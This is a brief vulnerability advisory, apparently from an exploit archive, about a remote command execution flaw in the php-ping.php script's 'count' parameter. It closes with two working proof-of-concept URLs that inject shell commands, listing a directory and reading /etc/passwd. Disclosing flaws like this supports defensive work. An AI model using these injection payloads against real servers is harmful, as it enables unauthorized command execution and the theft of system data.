9 lines
No EOL
660 B
Text
9 lines
No EOL
660 B
Text
source: http://www.securityfocus.com/bid/9309/info
|
|
|
|
It has been reported that php-ping may be prone to a remote command execution vulnerability that may allow remote attackers to execute commands on vulnerable systems. The problem exists due to insufficient sanitization of shell
|
|
metacharacters via the 'count' parameter of php-ping.php script.
|
|
|
|
Exploitation would permit a remote attacker to execute arbitrary commands with the privileges of the web server hosting the vulnerable software.
|
|
|
|
http://www.example.com/php-ping.php?count=1+%26+ls%20-l+%26&submit=Ping%21
|
|
http://www.example.com/php-ping.php?count=1+%26+cat%20/etc/passwd+%26&submit=Ping%21 |